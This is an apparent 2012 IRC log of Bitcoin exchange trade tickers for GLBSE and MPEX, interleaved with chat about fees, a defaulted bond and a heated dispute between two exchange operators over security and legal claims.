[DMC] 50 @ 0.06768999 = 3.3845 BTC [+] Aug 28 10:55:49 [GLBSE] [DMC] 30 @ 0.06899999 = 2.07 BTC [+] Aug 28 10:58:30 [GLBSE] [YABMC] 2 @ 0.1349 = 0.2698 BTC [-] Aug 28 10:59:57 [GLBSE] [PUREMINING] 13 @ 0.09739999 = 1.2662 BTC [+] Aug 28 11:00:04 [GLBSE] [FPGAMINING] 6 @ 0.92745 = 5.5647 BTC [+] Aug 28 11:01:05 [MPEX] [S.MPOE] 13430 @ 0.00038585 = 5.182 BTC [-] Aug 28 11:01:06 [MPEX] [S.MPOE] 17921 @ 0.00038677 = 6.9313 BTC [+] Aug 28 11:01:51 [GLBSE] [FPGAMINING] 4 @ 0.92755 = 3.7102 BTC [+] Aug 28 11:02:19 [GLBSE] [FPGAMINING] 2 @ 0.92745 = 1.8549 BTC [-] Aug 28 11:03:32 [GLBSE] [FPGAMINING] 1 @ 0.92745 BTC [-] Aug 28 11:04:33 [MPEX] [F.GIGA.ETF] 3395 @ 0.00094342 = 3.2029 BTC [-] Aug 28 11:05:24 [GLBSE] [PUREMINING] 10 @ 0.09739999 = 0.974 BTC [+] Aug 28 11:05:56 [GLBSE] [BBBB] 100 @ 0.00025 = 0.025 BTC [-] Aug 28 11:07:41 [GLBSE] [OBSI.HRPT] 50 @ 0.105 = 5.25 BTC [+] Aug 28 11:11:15 [GLBSE] [GMVT-BOT] 50 @ 0.171 = 8.55 BTC [+] Aug 28 11:14:39 oh lol someone wants to send me back the one shae and get the 1 btc and not take the wal at .9999999 Aug 28 11:21:21 [MPEX] [F.GIGA.ETF] 700 @ 0.00094342 = 0.6604 BTC [-] Aug 28 11:27:48 [MPEX] [S.MPOE] 554 @ 0.00038677 = 0.2143 BTC [+] Aug 28 11:27:48 [MPEX] [S.MPOE] 9700 @ 0.0003868 = 3.752 BTC [+] Aug 28 11:27:50 [MPEX] [S.MPOE] 3200 @ 0.00038681 = 1.2378 BTC [+] Aug 28 11:27:51 [MPEX] [S.MPOE] 1740 @ 0.00038731 = 0.6739 BTC [+] Aug 28 11:27:52 [MPEX] [S.MPOE] 28569 @ 0.00038772 = 11.0768 BTC [+] Aug 28 11:31:37 [MPEX] [S.MPOE] 21270 @ 0.00038519 = 8.193 BTC [-] Aug 28 11:32:19 [MPEX] [S.MPOE] 25631 @ 0.00038772 = 9.9377 BTC [+] Aug 28 11:32:20 [MPEX] [S.MPOE] 15369 @ 0.0003878 = 5.9601 BTC [+] Aug 28 11:38:59 [GLBSE] [BDT] 15 @ 1.03 = 15.45 BTC [-] Aug 28 11:41:41 [MPEX] [F.GIGA.ETF] 15895 @ 0.00095089 = 15.1144 BTC [+] Aug 28 11:47:32 [GLBSE] [MMM] 3 @ 0.9 = 2.7 BTC [+] Aug 28 11:49:10 [GLBSE] [OBSI.HRPT] 1 @ 0.105 BTC [+] Aug 28 11:49:53 [GLBSE] [BITNODES] 2 @ 0.2539 = 0.5078 BTC [+] Aug 28 11:51:06 [GLBSE] [ASICMINER] 108 @ 0.09849 = 10.6369 BTC [+] Aug 28 11:51:07 [GLBSE] [ASICMINER] 67 @ 0.0985 = 6.5995 BTC [+] Aug 28 11:51:09 [GLBSE] [ASICMINER] 75 @ 0.0986 = 7.395 BTC [+] Aug 28 11:51:45 [GLBSE] [PUREMINING] 5 @ 0.09739999 = 0.487 BTC [+] Aug 28 11:52:59 [GLBSE] [GIGAMINING] 2 @ 0.8655 = 1.731 BTC [+] Aug 28 11:53:29 [MPEX] [F.GIGA.ETF] 3300 @ 0.00095089 = 3.1379 BTC [+] Aug 28 11:55:16 [GLBSE] [GIGAMINING] 4 @ 0.86531 = 3.4612 BTC [-] Aug 28 11:55:54 [GLBSE] [MOORE] 3 @ 0.5001 = 1.5003 BTC [-] Aug 28 11:56:34 [GLBSE] [ASICMINER] 15 @ 0.0986 = 1.479 BTC [+] Aug 28 11:57:44 [GLBSE] [GIGAMINING] 1 @ 0.86532 BTC [+] Aug 28 11:57:46 [GLBSE] [GIGAMINING] 2 @ 0.86521 = 1.7304 BTC [-] Aug 28 11:58:29 [MPEX] [S.MPOE] 13663 @ 0.00038519 = 5.2629 BTC [-] Aug 28 11:58:31 [MPEX] [S.MPOE] 10490 @ 0.00038437 = 4.032 BTC [-] Aug 28 11:58:32 [MPEX] [S.MPOE] 24117 @ 0.00038362 = 9.2518 BTC [-] Aug 28 11:58:56 [GLBSE] [GIGAMINING] 1 @ 0.86521 BTC [-] Aug 28 12:00:27 [GLBSE] [GIGAMINING] 5 @ 0.861 = 4.305 BTC [-] Aug 28 12:01:37 [GLBSE] [NYAN.C] 1 @ 0.69 BTC [-] Aug 28 12:01:49 [GLBSE] [GIGAMINING] 1 @ 0.86 BTC [-] Aug 28 12:02:01 [GLBSE] [GIGAMINING] 2 @ 0.944899 = 1.8898 BTC [+] Aug 28 12:02:30 [GLBSE] [GIGAMINING] 1 @ 0.852 BTC [-] Aug 28 12:03:31 [GLBSE] [GIGAMINING] 1 @ 0.851 BTC [-] Aug 28 12:04:07 [GLBSE] [SYNERGY] 1 @ 0.151 BTC [-] Aug 28 12:04:09 [GLBSE] [SYNERGY] 1 @ 0.15000001 BTC [-] Aug 28 12:04:10 [GLBSE] [SYNERGY] 10 @ 0.15 = 1.5 BTC [-] Aug 28 12:05:52 [GLBSE] [BIB.PIRATE] 3 @ 0.3 = 0.9 BTC [+] Aug 28 12:06:00 [GLBSE] [ASICMINER] 1 @ 0.0986 BTC [+] Aug 28 12:07:26 [GLBSE] [ASICMINER] 30 @ 0.0986 = 2.958 BTC [+] Aug 28 12:07:28 [GLBSE] [ASICMINER] 70 @ 0.0987 = 6.909 BTC [+] Aug 28 12:07:30 [MPEX] [F.GIGA.ETF] 4957 @ 0.00094342 = 4.6765 BTC [-] Aug 28 12:07:31 [MPEX] [F.GIGA.ETF] 2655 @ 0.0009354 = 2.4835 BTC [-] Aug 28 12:26:15 [GLBSE] [BDK.BND] 5 @ 0.1 = 0.5 BTC [-] Aug 28 12:28:25 [MPEX] [S.MPOE] 8071 @ 0.00038439 = 3.1024 BTC [+] Aug 28 12:28:26 [MPEX] [S.MPOE] 27653 @ 0.0003868 = 10.6962 BTC [+] Aug 28 12:33:03 [GLBSE] [FPGAMINING] 1 @ 0.9099 BTC [-] Aug 28 12:35:33 [MPEX] [S.MPOE] 15600 @ 0.00038714 = 6.0394 BTC [+] Aug 28 12:40:28 [GLBSE] [BFLS] 1 @ 1.1499 BTC [+] Aug 28 12:41:00 [GLBSE] [BIF.5-10.MININGBOND] 1 @ 0.7 BTC [+] Aug 28 12:42:04 [GLBSE] [BDT] 20 @ 0.95000001 = 19 BTC [-] Aug 28 12:42:05 [GLBSE] [BDT] 54 @ 0.95 = 51.3 BTC [-] Aug 28 12:43:32 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2701 BTC [-] Aug 28 12:43:37 [GLBSE] [SILVER] 30 @ 0.00999999 = 0.3 BTC [-] Aug 28 12:43:58 [GLBSE] [SILVER] 3 @ 0.00999999 = 0.03 BTC [-] Aug 28 12:46:24 [GLBSE] [ASICMINER] 200 @ 0.0987 = 19.74 BTC [+] Aug 28 12:47:06 ;;rate w|zzy 1 Bought a number of raffle tickets from me. Aug 28 12:47:07 Rating entry successful. Your rating of 1 for user w|zzy has been recorded. Aug 28 12:48:23 [GLBSE] [ASICMINER] 2 @ 0.0987 = 0.1974 BTC [+] Aug 28 12:49:48 Luceo: no rating for coin? :( Aug 28 12:50:05 coingenuity: Didn't I? :o Aug 28 12:50:09 ;;rated coingenuity Aug 28 12:50:09 You have not yet rated user coingenuity Aug 28 12:50:17 I sometimes forget when people buy on the forum :P Aug 28 12:50:35 I dont yet know everyone's forum name to IRC name Aug 28 12:50:36 heh, i'm not a customer, just a fixture of sorts lmfao Aug 28 12:50:57 i am not really a forum user tbh Aug 28 12:50:59 not my cuppa tea Aug 28 12:51:03 I hope to be buying from you soon ;) Aug 28 12:51:15 =D Aug 28 12:51:33 makes me happy, i think a lot of people are sort of paused to see what pirate's effect is Aug 28 12:52:01 low gox volume + giant spreads == interesting to watch Aug 28 12:55:28 coingenuity: I'm enjoying the Gox market atm Aug 28 12:56:09 Im going to MLG in November so I'll probably get you to deliver to one of my colleagues and get them to bring it to my hotel :P Aug 28 12:56:16 heh Aug 28 12:56:21 Customs here might just disappear with it :/ Aug 28 12:56:43 i'm enjoying the gox market for my bots.... as a whole though, people are holding their breath and it's a little eerie to watch Aug 28 12:56:57 and, customs is usually no problem ;) Aug 28 12:57:02 I need a Gox bot Aug 28 12:57:07 + full insurance protects ya from their idiocy lol Aug 28 12:57:24 idk how much tax I have to pay on it either Aug 28 12:57:30 Might make it really expensive Aug 28 12:57:41 england is VAT exempt for PM if memory serves Aug 28 12:57:52 I'm not in England :( Aug 28 12:57:56 I have servers there Aug 28 12:58:03 where are you at, if you dont mind my asking? Aug 28 12:58:15 Usually Germany or Switzerland Aug 28 12:58:32 [GLBSE] [LTC-MINING] 1 @ 0.59 BTC [+] Aug 28 12:58:33 germany is VAT exempt on PM, so is CH Aug 28 12:58:47 Nice Aug 28 12:58:57 Might send it there then Aug 28 12:59:10 ya, better than UK imo Aug 28 12:59:11 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2701 BTC [-] Aug 28 12:59:13 [GLBSE] [TYGRR.BOND-P] 14 @ 0.27 = 3.78 BTC [-] Aug 28 12:59:21 Still think in-US shipping is an attractive option, but idk how it'd be to get through the airport Aug 28 12:59:30 'Oh btw there's $10k worth of gold in my bag' Aug 28 12:59:32 -_- Aug 28 12:59:38 lol Aug 28 12:59:56 most countries are OK with amounts around 1kg for on person carry in planes Aug 28 13:01:42 OK, time to run, bbiaw Luceo Aug 28 13:02:10 Ciao Aug 28 13:02:13 [GLBSE] [OBSI.HRPT] 10 @ 0.105 = 1.05 BTC [+] Aug 28 13:07:05 [GLBSE] [ZETA-MINING] 6 @ 0.151 = 0.906 BTC [-] Aug 28 13:09:54 [MPEX] [F.GIGA.ETF] 5800 @ 0.00093907 = 5.4466 BTC [+] Aug 28 13:09:55 [MPEX] [F.GIGA.ETF] 3845 @ 0.0009354 = 3.5966 BTC [-] Aug 28 13:09:57 [MPEX] [F.GIGA.ETF] 2077 @ 0.00093152 = 1.9348 BTC [-] Aug 28 13:10:59 [GLBSE] [ASICMINER] 150 @ 0.0987 = 14.805 BTC [+] Aug 28 13:16:06 [GLBSE] [GIGAMINING] 2 @ 0.9445 = 1.889 BTC [+] Aug 28 13:30:08 [MPEX] [S.MPOE] 41276 @ 0.0003878 = 16.0068 BTC [+] Aug 28 13:30:10 [MPEX] [S.MPOE] 9434 @ 0.00038799 = 3.6603 BTC [+] Aug 28 13:32:34 [GLBSE] [GIGAMINING] 6 @ 0.9446 = 5.6676 BTC [+] Aug 28 13:36:28 [GLBSE] [PPT.E] 5 @ 0.5 = 2.5 BTC [-] Aug 28 13:36:30 [GLBSE] [PPT.E] 7 @ 0.36101 = 2.5271 BTC [-] Aug 28 13:36:55 [GLBSE] [PPT.A] 5 @ 0.36101 = 1.8051 BTC [-] Aug 28 13:37:34 [GLBSE] [GSDPT] 50 @ 0.0034 = 0.17 BTC [+] Aug 28 13:38:19 [MPEX] [F.GIGA.ETF] 1948 @ 0.00094838 = 1.8474 BTC [+] Aug 28 13:39:21 [GLBSE] [BITBOND] 6 @ 0.467 = 2.802 BTC [+] Aug 28 13:41:00 [GLBSE] [BITCOINTORRENTZ] 1 @ 0.666 BTC [+] Aug 28 13:41:07 [GLBSE] [FPGAMINING] 3 @ 0.9099 = 2.7297 BTC [-] Aug 28 13:41:09 [GLBSE] [FPGAMINING] 1 @ 0.91 BTC [+] Aug 28 13:41:35 [GLBSE] [RAREEARTH] 1 @ 0.01 BTC [+] Aug 28 13:42:03 [GLBSE] [BTC-MINING] 1 @ 0.98 BTC [-] Aug 28 13:43:07 how do i chang emy name, i forgot lol Aug 28 13:46:12 [GLBSE] [BMMO] 5 @ 0.109879 = 0.5494 BTC [+] Aug 28 13:46:46 [GLBSE] [YABMC] 1 @ 0.1348 BTC [-] Aug 28 13:48:21 Chaaang-Noi: try /nick new_name Aug 28 13:49:45 thanks Aug 28 13:49:55 Chaaang-Noi: you had any luck contacting pirate? Aug 28 13:50:05 no, i have not really tried Aug 28 13:50:14 no information at all :( Aug 28 13:50:16 no Aug 28 13:50:31 try contact him? Aug 28 13:50:35 why? Aug 28 13:50:47 and ask what? Aug 28 13:50:49 [GLBSE] [ASICMINER] 2 @ 0.0987 = 0.1974 BTC [+] Aug 28 13:50:58 get the btc back :) I have some tygr bonds Aug 28 13:51:20 umm, i think he knows i want the btc... Aug 28 13:51:30 ask "Where's My Money" Aug 28 13:51:32 i asked for btc on the 15th Aug 28 13:51:42 he said "in his system" Aug 28 13:51:50 iv asked already... Aug 28 13:51:54 OK Aug 28 13:53:27 [GLBSE] [ASICMINER] 58 @ 0.0988 = 5.7304 BTC [+] Aug 28 13:58:48 [GLBSE] [ASICMINER] 2 @ 0.0988 = 0.1976 BTC [+] Aug 28 13:59:26 thoz Aug 28 13:59:26 r Aug 28 13:59:27 mi Aug 28 13:59:29 popsiklz Aug 28 13:59:52 are you drunk Aug 28 14:00:44 [MPEX] [F.GIGA.ETF] 8923 @ 0.00093152 = 8.312 BTC [-] Aug 28 14:01:21 [GLBSE] [ASICMINER] 90 @ 0.0988 = 8.892 BTC [+] Aug 28 14:02:53 diablo-d3 Aug 28 14:03:00 the noid is some type of Aug 28 14:03:02 pizza demon Aug 28 14:03:20 tes Aug 28 14:03:21 yes Aug 28 14:05:39 [GLBSE] [DI.BFLSC.SUCCEED] 3 @ 0.001 = 0.003 BTC Aug 28 14:13:21 [MPEX] [S.MPOE] 4288 @ 0.00038714 = 1.6601 BTC [-] Aug 28 14:18:24 [MPEX] [S.MPOE] 12595 @ 0.00038799 = 4.8867 BTC [+] Aug 28 14:18:25 [MPEX] [S.MPOE] 14105 @ 0.00038823 = 5.476 BTC [+] Aug 28 14:19:10 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2701 BTC [+] Aug 28 14:19:11 [GLBSE] [TYGRR.BOND-P] 6 @ 0.27 = 1.62 BTC [-] Aug 28 14:19:21 [GLBSE] [PAJKA.BOND] 2 @ 0.067 = 0.134 BTC [-] Aug 28 14:19:23 [GLBSE] [PAJKA.BOND] 1 @ 0.066 BTC [-] Aug 28 14:19:23 [GLBSE] [PAJKA.BOND] 1 @ 0.065 BTC [-] Aug 28 14:19:24 [GLBSE] [PAJKA.BOND] 29 @ 0.045 = 1.305 BTC [-] Aug 28 14:19:59 [MPEX] [F.GIGA.ETF] 5200 @ 0.00092575 = 4.8139 BTC [-] Aug 28 14:20:01 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.92307691 BTC [+] Aug 28 14:21:30 [MPEX] [S.MPOE] 200 @ 0.000388 = 0.0776 BTC [-] Aug 28 14:21:31 [MPEX] [S.MPOE] 13009 @ 0.00038823 = 5.0505 BTC [+] Aug 28 14:21:33 [MPEX] [S.MPOE] 25391 @ 0.00038844 = 9.8629 BTC [+] Aug 28 14:27:41 [GLBSE] [GSDPT] 2500 @ 0.0034 = 8.5 BTC [+] Aug 28 14:28:08 [GLBSE] [ASICMINER] 27 @ 0.0988 = 2.6676 BTC [+] Aug 28 14:28:08 [GLBSE] [ASICMINER] 20 @ 0.09888 = 1.9776 BTC [+] Aug 28 14:35:01 [MPEX] [F.GIGA.ETF] 3977 @ 0.00092983 = 3.6979 BTC [+] Aug 28 14:38:34 [GLBSE] [GOLD] 1 @ 0.00989 BTC [-] Aug 28 14:40:21 [MPEX] [S.MPOE] 200 @ 0.00038799 = 0.0776 BTC [-] Aug 28 14:40:22 [MPEX] [S.MPOE] 1326 @ 0.00038714 = 0.5133 BTC [-] Aug 28 14:40:24 [MPEX] [S.MPOE] 1500 @ 0.00038507 = 0.5776 BTC [-] Aug 28 14:41:04 [GLBSE] [TEEK.B] 3 @ 0.999 = 2.997 BTC [+] Aug 28 14:43:16 [MPEX] [S.MPOE] 19083 @ 0.00038362 = 7.3206 BTC [-] Aug 28 14:43:18 [MPEX] [S.MPOE] 14866 @ 0.00038344 = 5.7002 BTC [-] Aug 28 14:43:55 [MPEX] [F.GIGA.ETF] 1000 @ 0.00093463 = 0.9346 BTC [+] Aug 28 14:53:28 [MPEX] [S.MPOE] 25600 @ 0.00038403 = 9.8312 BTC [+] Aug 28 14:53:36 [GLBSE] [DI.BFLSC.FAIL] 400 @ 0.001 = 0.4 BTC [+] Aug 28 14:58:46 [GLBSE] [BDK] 1 @ 0.05 BTC [-] Aug 28 14:59:23 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2691 BTC [-] Aug 28 14:59:25 [GLBSE] [TYGRR.BOND-P] 12 @ 0.269 = 3.228 BTC [-] Aug 28 15:01:03 [GLBSE] [PUREMINING] 1 @ 0.09300001 BTC [-] Aug 28 15:01:04 [GLBSE] [PUREMINING] 1 @ 0.093 BTC [-] Aug 28 15:01:06 [GLBSE] [PUREMINING] 1 @ 0.093 BTC [-] Aug 28 15:01:07 [GLBSE] [PUREMINING] 10 @ 0.092 = 0.92 BTC [-] Aug 28 15:03:05 [GLBSE] [PUREMINING] 9 @ 0.0913 = 0.8217 BTC [-] Aug 28 15:03:07 [GLBSE] [PUREMINING] 43 @ 0.0912 = 3.9216 BTC [-] Aug 28 15:03:08 [GLBSE] [PUREMINING] 17 @ 0.0911 = 1.5487 BTC [-] Aug 28 15:03:09 [GLBSE] [PUREMINING] 9 @ 0.091 = 0.819 BTC [-] Aug 28 15:03:10 [GLBSE] [PUREMINING] 56 @ 0.09 = 5.04 BTC [-] Aug 28 15:04:15 [GLBSE] [PUREMINING] 43 @ 0.09 = 3.87 BTC [-] Aug 28 15:05:49 [GLBSE] [BIB.PIRATE] 6 @ 0.3 = 1.8 BTC [+] Aug 28 15:15:37 [GLBSE] [PPT.DIV] 27 @ 0.00021 = 0.0057 BTC [-] Aug 28 15:22:57 what is this netxshare problem? Aug 28 15:27:10 [MPEX] [S.MPOE] 16200 @ 0.00038344 = 6.2117 BTC [-] Aug 28 15:27:58 hm Aug 28 15:28:03 what did i just do Aug 28 15:30:07 mornin Aug 28 15:32:16 [GLBSE] [TYGRR.BOND-P] 3 @ 0.3 = 0.9 BTC [+] Aug 28 15:35:40 oh lol BDT drama again Aug 28 15:36:10 dont worry people, ill have a fix for that too. Aug 28 15:38:03 [MPEX] [S.MPOE] 15774 @ 0.00038403 = 6.0577 BTC [+] Aug 28 15:38:04 [GLBSE] [TYGRR.BOND-P] 5 @ 0.269 = 1.345 BTC [-] Aug 28 15:38:48 [GLBSE] [DMC] 100 @ 0.06899998 = 6.9 BTC [-] Aug 28 15:38:51 [MPEX] [S.MPOE] 5900 @ 0.00038844 = 2.2918 BTC [+] Aug 28 15:39:15 [GLBSE] [DMC] 70 @ 0.06899999 = 4.83 BTC [+] Aug 28 15:39:48 [GLBSE] [OBSI.ABMO] 7 @ 0.07999999 = 0.56 BTC [+] Aug 28 15:39:53 [GLBSE] [DMC] 7 @ 0.069 = 0.483 BTC [+] Aug 28 15:40:24 kakobrekla summary ? Aug 28 15:40:45 summary : the owner/developer/whatever is a jackass Aug 28 15:40:59 Read bitscalper, repeat.... Aug 28 15:42:59 for a moment i had thought we were discussing bdk Aug 28 15:43:16 lol Aug 28 15:43:25 this is the jro thing, the guy who mysteriously has money to do real estate developing, in partnership with the kenna of tradehill Aug 28 15:43:36 who also mysteriously has money yet it's not clear his users were repaid Aug 28 15:43:39 that about it ? Aug 28 15:43:52 The same Aug 28 15:44:14 And his partnership with some shady guy called Alberto... Aug 28 15:44:20 [GLBSE] [ASICMINER] 2 @ 0.102 = 0.204 BTC [+] Aug 28 15:44:34 somebody should write Bitcoin : A musical! Aug 28 15:44:46 it's always the same play, just change the names and stock characters, Aug 28 15:44:50 sorta like opera buffa. Aug 28 15:44:54 Who apparently made the bitscalper fuckup, then kronos, and now is repeating with BDT Aug 28 15:45:28 Sometimes the names are also the same :) Aug 28 15:45:47 It's like an infinite sequel Aug 28 15:46:51 [GLBSE] [UDN] 1 @ 0.0999 BTC [-] Aug 28 15:46:58 [GLBSE] [UDN] 1 @ 0.0999 BTC [-] Aug 28 15:48:19 mircea_popescu: can mpex users transfer assets/ btc to each other? Aug 28 15:48:55 yes, if you remember you took out the fee on glbse because i was offering it for free and you had to compete. Aug 28 15:49:08 no Aug 28 15:49:10 or else you'd have lost the gigavps listing. Aug 28 15:49:11 o, yes. Aug 28 15:49:13 GLBSE has a fee Aug 28 15:49:24 yea, for the little people it does. Aug 28 15:49:27 for transfering assets Aug 28 15:49:32 it's just that i don't care about them, so. Aug 28 15:49:35 [GLBSE] [ASICMINER] 32 @ 0.102 = 3.264 BTC [+] Aug 28 15:49:37 [GLBSE] [ASICMINER] 71 @ 0.10899 = 7.7383 BTC [+] Aug 28 15:50:23 mircea_popescu: gigavps paid fees Aug 28 15:50:34 like everyone else Aug 28 15:50:36 btw. nefario: the fee applies always? or the assets issuers can receive their own assets without a fee? Aug 28 15:50:38 if you say so. Aug 28 15:51:00 rdponticelli: the sender pays the fee Aug 28 15:51:09 only if the asset has traded more than 20BTC Aug 28 15:51:25 It doesn't matters if he is the issuer Aug 28 15:51:27 and it's only 0.2% Aug 28 15:51:33 no it doesn't Aug 28 15:51:37 Ok Aug 28 15:51:44 BTC has no transfer fees Aug 28 15:51:46 never had Aug 28 15:51:54 Yea, I know Aug 28 15:52:01 if you're an asset issuer Aug 28 15:52:16 Otherwise, people would use free address transfers... Aug 28 15:52:17 there are no fees to transfer between your personal account and the issuer account Aug 28 15:52:35 Ah, ok Aug 28 15:52:45 And Aug 28 15:52:50 issuers can have transfer fees removed Aug 28 15:52:52 ... Aug 28 15:52:57 for a fee Aug 28 15:53:07 which can be waived ? Aug 28 15:53:10 How's that? Aug 28 15:53:26 they pay us to remove the transfer fee Aug 28 15:53:29 The Inaba negotiations? Aug 28 15:53:32 [GLBSE] [DMC] 10 @ 0.069 = 0.69 BTC [+] Aug 28 15:53:46 it's usually more upfront Aug 28 15:53:50 but less overall Aug 28 15:54:00 It would only make sense for a really large volume, right? Aug 28 15:54:03 especially if you do a lot of presales Aug 28 15:54:14 yes Aug 28 15:54:40 I'm trying to adjust my bussiness plan... Aug 28 15:54:48 And the fee is going to kill me Aug 28 15:55:02 I'm taking profits in my shitty fiat Aug 28 15:55:09 And have to pay in btc Aug 28 15:55:12 [GLBSE] [RAREEARTH] 437 @ 0.01 = 4.37 BTC [+] Aug 28 15:55:14 [GLBSE] [RAREEARTH] 363 @ 0.01 = 3.63 BTC [+] Aug 28 15:55:22 It won't be sustainable... Aug 28 15:55:27 what business is this ? Aug 28 15:55:28 later Aug 28 15:56:41 I take local fiat, and exchange it for a simbol on glbse Aug 28 15:56:45 rdponticelli: I'm trying to IM you Aug 28 15:56:48 you getting that? Aug 28 15:56:56 o ?! interesting. Aug 28 15:56:57 So people can trade it freely for btc Aug 28 15:57:11 Yea... Aug 28 15:57:13 so sort of like a fiat broker ? why aren't you on mpex lol. Aug 28 15:57:22 because its shit Aug 28 15:57:37 dun hate nefario. Aug 28 15:58:00 power to truth Aug 28 15:58:22 i don't see your answer to the security discussion yet. Aug 28 15:58:35 you steal leaking userinfo to good old google ? Aug 28 15:59:04 what about the legal risks of hosting copyrighted materials on the same server as mpex? Aug 28 15:59:08 didn't mention that Aug 28 15:59:28 your "security" piece is a load of bullshit Aug 28 15:59:53 o i c. no power to truth, just power to "we lie and pretend and hoppe nobody notices" ? Aug 28 15:59:58 what are you, a forum banker ? Aug 28 16:01:16 (8:59:50 PM) mircea_popescu:> "we lie and pretend and hoppe nobody notices" ? Aug 28 16:01:20 seems to be your mo Aug 28 16:01:47 although Aug 28 16:01:55 plenty of people been calling you on it Aug 28 16:02:08 you justset your record on repeat Aug 28 16:03:26 o right, right. i see, kindergarten defense. Aug 28 16:03:38 how many of the so called assets on that so called exchange of yours have burned investors ? Aug 28 16:03:42 do you even keep a count anymore ? Aug 28 16:03:58 you've not counted the successes Aug 28 16:04:00 also Aug 28 16:04:03 it's a free market Aug 28 16:04:13 o i c, it's a free market. more power to you. Aug 28 16:04:15 people are responsible for what they do with their own money Aug 28 16:04:20 now go fix your various issues before someone defaces you. Aug 28 16:04:45 and i expect serious answers because this "o it's shit" doesn't work. Aug 28 16:04:52 [GLBSE] [PIMP] 1 @ 0.153 BTC [-] Aug 28 16:04:58 you can't win a words argument with me. you will have to build a better product. Aug 28 16:05:01 [GLBSE] [OBSI.HRPT] 2 @ 0.104 = 0.208 BTC [-] Aug 28 16:05:05 well you're making some pretty serious claims Aug 28 16:05:11 on that page Aug 28 16:05:17 unless youre privy to information Im not Aug 28 16:05:25 on GLBSE accounts getting hacked Aug 28 16:05:34 so Aug 28 16:05:39 suck it Aug 28 16:05:40 and Aug 28 16:05:40 so go correct it. Aug 28 16:05:41 gnight Aug 28 16:05:52 whenever, when you wake up. Aug 28 16:05:58 What page? Aug 28 16:06:25 [GLBSE] [MERGEDMINING] 1 @ 0.0801 BTC [-] Aug 28 16:06:33 mircea_popescu: make up some security vulnerabilites and compromises about GLBSE Aug 28 16:06:38 posted it on his porn site Aug 28 16:06:45 says "it's legit" Aug 28 16:06:51 and Aug 28 16:06:52 Luceo http://trilema.com/2012/security-comparison-of-bitcoin-denominated-instruments-exchanges/ Aug 28 16:06:59 "prove me wrong" Aug 28 16:07:03 nefario learn to quote srsly. Aug 28 16:07:17 mircea_popescu: learn to paraphrase Aug 28 16:07:34 he's making claims with no evidence Aug 28 16:07:35 no see, it's bad to paraphrase when you're part to a dispute. Aug 28 16:07:45 and convieniently ignoring the shit on his own doorstep Aug 28 16:08:01 what shit is that dood ? "copyrighted material" ? Aug 28 16:08:14 i've had about half dozen fraudulent or otherwise baseless dmca notices in the past 5 years Aug 28 16:08:17 i disputed all of them Aug 28 16:08:20 that goes in the legal risks Aug 28 16:08:23 other party never responded to the dispute filing. Aug 28 16:08:24 also Aug 28 16:08:27 dun dun dun. Aug 28 16:08:33 I live in manchester Aug 28 16:08:35 UK Aug 28 16:08:41 im eagerly awaiting on the next half dozen batch. Aug 28 16:08:49 [GLBSE] [FPGAMINING] 6 @ 0.90999 = 5.4599 BTC [-] Aug 28 16:08:57 o, you're in the uk ? so say so (there!) so people know better. why is this so hard ? Aug 28 16:08:57 I pointed several out yesterday Aug 28 16:09:08 your retort was: then post it on my site" Aug 28 16:09:22 I'm in China Aug 28 16:09:25 on holiday Aug 28 16:09:32 ending soon Aug 28 16:09:37 [GLBSE] [YABMC] 9 @ 0.1348 = 1.2132 BTC [-] Aug 28 16:09:39 [GLBSE] [YABMC] 26 @ 0.1349 = 3.5074 BTC [+] Aug 28 16:09:40 [GLBSE] [YABMC] 146 @ 0.135 = 19.71 BTC [+] Aug 28 16:09:41 I've been living in the UK for nearly a year Aug 28 16:09:42 [GLBSE] [YABMC] 10 @ 0.135 = 1.35 BTC [+] Aug 28 16:09:42 ok. Aug 28 16:09:46 not a secret Aug 28 16:10:04 weren't you saying you work there at some point ? Aug 28 16:10:13 work where? Aug 28 16:10:21 in china. Aug 28 16:10:26 weren't you teaching or w/e ? Aug 28 16:10:37 ja Aug 28 16:10:39 a year ago Aug 28 16:11:46 [09:57:10] so sort of like a fiat broker ? why aren't you on mpex lol. << Yea, I help funnelling Argentine fiat Into btc. I thought about doing it in mpex and I even asked you if there was a fee back then... but people here would never wrap their heads around how mpex works.... Aug 28 16:11:53 nefario: Make a rebuttal then if its FUD Aug 28 16:12:05 and WTF does this mean? Aug 28 16:12:06 Either the exchange itself, the public face or both may be identified at a later date as Does in the Cartmell - Bitcoinica lawsuit. Aug 28 16:12:16 rdponticelli well actually people here do, some of them. smickles is making some decent moves as a broker. Aug 28 16:12:22 Maybe when they are some brokers sites... Aug 28 16:12:25 the advantage'd be you'd actually have something to sell. Aug 28 16:12:29 A response pointing out all of the inaccuracies Aug 28 16:12:41 nefario that means you might be identified as one of the does 1-60 Aug 28 16:12:53 as in, you are associated with the sued group, you worked for intersango, this is a risk. Aug 28 16:12:55 not possible Aug 28 16:12:59 orly. as you know ? Aug 28 16:13:04 ja Aug 28 16:13:12 tell you something from the future : if you or glbse are listed there Aug 28 16:13:18 you will probabluy suspend all btc withdrawals Aug 28 16:13:30 because a judge might ulteriorly ruled they were fraudulent and you will be responsible. Aug 28 16:13:40 so just on the strength of that alone your position is VERY dubious legally. Aug 28 16:13:44 this is unfounded Aug 28 16:13:55 and being in china;'d at least offer some legal proofness. Aug 28 16:13:57 you've got no basis for any of these accusations Aug 28 16:14:07 none at all Aug 28 16:14:30 ... Aug 28 16:14:31 next point: Aug 28 16:14:34 >Holds personally indentifying information of users without a license (an offense in the EU). Aug 28 16:14:38 were you ore were you not associated with the defendants ? Aug 28 16:14:47 no, we're not moving on ywt. Aug 28 16:14:51 you clearly have no understanding of the data protection act Aug 28 16:15:04 you don't need a licence Aug 28 16:15:04 we;re still on the cartmell suit. Aug 28 16:15:17 Im not involved in the cartmell suit Aug 28 16:15:22 not what i said. Aug 28 16:15:24 were you ore were you not associated with the defendants ? Aug 28 16:15:34 I said I'm not involved Aug 28 16:15:45 i don't care what you say. answer the fucken question already Aug 28 16:15:50 buncha weaseling. "i'm not involved" Aug 28 16:15:51 fuck off Aug 28 16:15:54 gobshite Aug 28 16:15:55 point is in two months you COULD BE Aug 28 16:16:00 at which point glbse ends. Aug 28 16:16:07 no Aug 28 16:16:09 I couldn't Aug 28 16:16:09 "sorry uzers lawl" Aug 28 16:16:13 you couldn't ? Aug 28 16:16:14 why not ? Aug 28 16:16:28 do you have a waiver or something ? Aug 28 16:16:29 you have a reason for me to be? Aug 28 16:16:40 